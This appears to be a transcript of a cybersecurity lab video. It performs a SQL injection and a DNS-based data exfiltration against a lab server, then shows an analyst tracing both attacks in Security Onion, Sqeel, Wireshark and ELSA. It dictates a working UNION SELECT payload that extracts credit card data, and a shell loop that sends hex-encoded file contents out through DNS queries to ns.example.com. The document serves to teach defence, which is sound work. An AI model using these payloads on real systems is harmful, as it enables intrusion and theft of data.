Here we're going to perform an SQL injection attack and then analyze it, and then we'll do data exfiltration using DNS and then analyze that. So our role as an analyst is to try to find out if an attack happened, what attack exactly happened, and what data was taken. But before we can do that, we actually have to have an attack to investigate. So we'll do the attack first, and actually we'll do two of them, and then we'll do the investigation. So we'll start with our SQL injection attacks. The first thing we want to do is, right now the screen you're seeing is Security Onion. We're going to open a terminal Security Onion just to make sure all our services are running. So if we right click on the desktop, click Open Terminal, and then type sudo, remove that, sudo space service nsm status, and hit enter, and hopefully everything says okay, and it does. So then we're going to log into our Kali virtual machine and go to Firefox. So I just clicked over to that. I've got them all kind of open and prearranged, so we're relatively quick. We'll click on Firefox, and then we're going to go to our Metasploitable server, which is just our server that has all kinds of stuff. It's our vulnerable server, and it has all kinds of different things on it for us. In this case, it's got a web that is vulnerable to SQL injection. So we'll go to 209, I'll think my numlock's on, 209.165.200.235, and hit enter. And then we're going to click right here. And then we're going to go to OWASP Top 10. So they're a group that has does a blog and has all kinds of tools and stuff. We'll navigate over to A1 injection, SQLi extract data, and over to user info, and then click on that. And then we're going to right click in the name box. So if we right click, we go to inspect element. Double click on 20, we're going to change that to 100, and hit enter, and then you can go ahead and close the box. We're going to use the union operator to extract credit card data from the database. So single quote, somebody clicked in there, single quote, space union, space select, space CCID, comma CC number, comma CCV, comma expiration, comma null, space from, space credit, underscore cards, space dash dash, and then another space, and click view account details, and that pulled all our credit card information from the database. Now we want to go and analyze that. So we're going to use our SQL logs to do that. So we're going to go back to the Security Onion. Back in Security Onion, then we double click on SQL, and the username is analyst, and the password CyberOps. Select all, start SQL. And then we were looking for ET web server possible, what does it say again? Possible SQL injection attempt. So right here, we'll go to the column that says CNT in it. Right click on that packet, down to view correlated events. And then on the right under alert ID, we want to right click on that. Hold our right click, go down to transcript, and let go. And now we can see what happened during that attack. I can see that the GET statement used the union operator to access credit card information. And now I can search to see kind of what information they got. If I go to search and I type in username, and click Find. We'll click Find again, move this window out of the way, and we see our username and we see credit card information. And so now we can look through and see the data that they found as well. You compare that credit card information from the transcript window and the content that was extracted by the SQL injection attack. They should be the same, because the attack is what you did. Normally, obviously someone else would be doing that, and you would be analyzing what information they got. But since you can see them both, you can verify that, yeah, I saw in our CyberOps machine, or our Kali machine, I believe, I did the attack, I saw the credit cards. Now if I go back, I would go through, and this would be the first credit card number in the list, so they should be the same. We can go and close the windows. We're going to go back to Squeal, and right-click on the same alert, but then open it with Wireshark. So we right-click and go down to Wireshark, and click. I was going to click OK, but I'll let it open. And now, as we go to Wireshark, we want to follow the TCP stream. So just find one of the TCP packets, right-click, go down to Follow TCP Stream, and then that opens it up. We're seeing similar data as we just saw in our previous window. We can see the union operator was used to get credit card numbers. And then if we scroll through it, where'd it go? There we go. We'd also go through and find the data. I suppose I could have searched the same username and credit card information. So now if you wanted to now, you could go ahead and just save it so you could analyze it more later, or keep the information to make sure you have it. Now we're going to go to Elsa and look over the Elsa logs for this. Go ahead and close these up. And let's open Elsa, so we'll click on Elsa. Try that again. Watch, I'm going to have like 4 windows open. Of course. I get a little click happy. We'll close that one. Now if you get this, that's fine. Advanced, proceed to localhost, analyst and CyberOps. And then we want to go to HTTP top potential SQL injection, and click on that. Go ahead and click on this address. Then we'll go down to info in the very last field. And go plug in, get PCAP, analyst and CyberOps again. And again, just another way to see the data that was gotten through the SQL injection. If we do a Control F, and we're still seeing the same information, right? We used Union to get credit card information. This was the host that was compromised. Now if we do a Control F, we should be able to do username again. And then again, we find the data they got from our database. So those are just a few different ways to get information about an attack that occurred, in this case, your SQL injection attack. So now let's go ahead and exfiltrate data using DNS. All right, for this one, I brought over my CyberOps workstation window. We'll start in there. Basically, the Metasploitable virtual machine is configured as a DNS server, and our attacker, or us in this case, and then we'll follow the attack, is going to exfiltrate data from a confidential.txt file using DNS. So we start in our CyberOps workstation, open a terminal window, and we're going to go to, I think we got to go to where our confidential.txt file is. So home analyst lab.support.files. We should be in home analyst right now. Let's just double check. All right, so if we do cd space, we want to go to lab.support.files. And if we do an ls, we should see a confidential.txt file. That's right there. We can use the more command to look at the file. So this is what's in it. Now we're going to use the xxd command to create a hex dump of the file. And then we're going to save it to confidential.hex. So xxd space dash p space confidential.txt greater than symbol confidential.hex. All right, so I think that's it. XXD is going to be used to translate it or turn it into hex. Dash P is used to format the output in PostScript. So translate it, PostScript, the text file, and then redirect the output or send the output to confidential.hex. Hit enter. Now let's just verify that it's there. So we do, and we'll look at it, confidential.hex. Okay, that looks like how it should look right now. So now we want to verify that the CyberOps workstation is configured to use the local DNS resolver at our Metasploitable machine. So that's the .235 address. So we'll just do cat space /etsy /resolve.conf with no E, sorry. I know that. There we go. I like to shorten words. I always want to finish the word. And we do have it in there. So I think we're good there. Now we want to go ahead and we're going to prepend the content to the DNS query log. All right, now we're going to run or write a for loop that is going to iterate through each line of our confidential.hex file and add a line of the hex string to the name of the target domain server, which is ns.example.com. A DNS query will then be performed on each of these lines, and then we'll look for our hex string plus ns.example.com. So let's go ahead and type in our for loop. So for space line in backtick. Whoops, that's a tilde. There we go. Cat confidential dot. I always have to move my mouse. .hex. Another backtick. Space semicolon space do drill space $, line.ns.example.com semicolon space done, and then we'll hit enter and let that run. Oh, there we go. So what we should be doing is prepending ns. Actually, I don't know if we're prepending our hex to ns.example.com. And we can see prepended part and then the ns.example.com. So we're almost there. So now as the attacker, we're going to go ahead and we're going to go to our query.log over on Kali and retrieve the data. So I think if I just, sorry, this is our previous. We can just close this up and right click and go to open terminal. And then from our Kali box, we're going to SSH into our Metasploitable server. Remember, our Metasploitable server is serving as our DNS server. So SSH space user at 209.165.200.235. And the username and password both should be user. Probably should have made sure I had connectivity. It's taking a little longer than I expected. Oh, I'm going to type that right. Oh, I did. Okay, good. Now we can go ahead and use our egrep command to parse the DNS query log file. So now we're in Metasploitable. Egrep space -o space square brace or square bracket 0-9 A through F. Suddenly our previous slab and all these little symbols here become a little useful. Our regular expressions. Oh, egrep space -o space bracket 0-9 A through F bracket asterisk dot ns dot example .com /var /lib /bind /query .log space pipe space cut -d dot -f1 pipe again uniq greater than secret dot hex No, we type all this in, we double check that we're close, so come on. But as we do that, let's go back. So our egrep command is the same as grep-e, and it allows the interpretation of extended regular expressions. -o displays only the matching portions. Here, this section is our regular expression to match portions of our query log. 0 or more occurrences, lowercase letters and numbers with ns.example.com, which we know we created that earlier. The cut command, do I have that in there? It should. Let's move, there we go. It's going to remove a section from each line of the files. The -d period -f1 uses the period as the delimiter to keep only the subdomain. It'll remove the rest of the line for the FQDN. And then unique or uniq removes any of the duplicates. Pipe takes the output of the command to its left and becomes the input to the command on the right of the pipes. There's 2 of them in here. And then lastly, we are going to send our results into a secret.hex file. I think it's because I moved my mouse out of the way and then there we go. So I think we got it all, right? egrep-o, our regular expression, then include ns.example.com. Where are we doing this? What are we doing this with? That's the query.log file. We're going to remove a section from each line. We're going to use the period as the delimiter and remove the rest of the line with the FQDN. Remove any duplicates, and then save it or redirect it to secret.hex file. So that's what we're doing there. Let's hit enter. And then let's see that our file was created. Cat space secret dot hex, and hit enter. And it was. We can go ahead and exit out of our SSH session. And now we're going to copy our data over to Kali. Exit. Now we're in Kali. Let's go ahead and copy then that secret.hex file that we just got. So scp space user at 209.165.235.home/user/secret .hex space tilde slash, and then I'll copy that secret.hex file that we just created on our Metasploitable server, or DNS server. Maybe I should keep referring it to DNS, might be easier to visualize. That information that we just basically got, now we're just going to have to convert it. We got the information using DNS. We're going to pull that secret.hex file over to our Kali so that then we can convert the hex to binary. It may take a minute. We're waiting for it. And then basically our next step is we're just going to reverse our hex dump using our xxd command. Then we're going to use a cat command to verify it. And then we'll use Elsa to examine what happened. There we go. Okay, password should be CyberOps. Oh, which I'm not typing in right. Oh, user. Yeah, sorry, it wasn't CyberOps, it was user. I wasn't thinking. All right, so we've got our file. Now we want to go and reverse the hex dump. xxd space -r -p space secret dot hex space greater than space secret dot txt. Hit enter. Now let's verify that now we've taken that hex and turned it into something we can read. Cat space secret dot txt. All right, so now we have just exfiltrated the confidential document using DNS. Now let's go through and analyze what happened. So now you were the attacker, you're over on that part. Now you're the analyst, and we've got to look and see if we can figure out what happened, or just view our logs to kind of follow the trail. I just pulled my Security Onion virtual machine window back over. We're going to start Elsa again. Try to be a little more patient this time and see if there we go. And CyberOps, an analyst. Sorry, backwards. Wow, I've now typed it too many times. Analyst is my user. CyberOps is my password. Now we're going to go to the left side. We're going to go to DNS. DNS bottom next to requests. Whoops, right here. Click that. We'll scroll through and try to find our ns.example. Here we go. The hex in the front, this 63 byte string, is probably an indicator of malicious activity, as DNS usually isn't going to be sent that way. Or I should say your domain name is not going to be a hex number, right? So if we click on one of them, and then we go ahead and we'll copy the hex string at the beginning. Come on, I want to copy this. And then we're going to go ahead and open our terminal window. And type echo -n space double quotes. Then we'll right click and paste. Well, that got more than I wanted. Let's go back and do that. Let's get rid of that. That's not what we want. I need to go back to my other window and highlight it. Oh, I'm a dork, because I was looking down too far. Let's highlight the part in the top, because we just want this hex portion. So just highlight it and copy. Now paste it in. It's like sometimes when you're doing stuff, you kind of know something's a little off, but just brain's not clicking. And then a double quote space pipe space xxd -r space -p, and then hit enter. And we see our first string of our confidential document. So what do you think, if you continue to revert these hex strings, what do you think is going to happen? Right, we're just going to keep getting each one of those strings, remember, was pre-appended to our ns.example. So each one of the original readable text strings that we converted to hex were added to the ns.example. So if we keep flowing through our Elsa log back here, and then we keep taking these hex strings and copy them in using our xxd command to revert them back, we're going to get each piece of the confidential, or each piece of text that was in that confidential.txt file originally. So now you've done, what have we done? We've done our SQL injection, we exfiltrated data using DNS, and then we reverted that data so we can start seeing it. If we kept adding these strings, if we kept doing this over and over again with a new hex string every time, we would get another piece of that confidential data that we took, or that the attacker took. So we would be able to, as an analyst in this case then, you would be able to find out what the attacker got a hold of. Okay, so I think that's it for this one. A couple long ones in this chapter.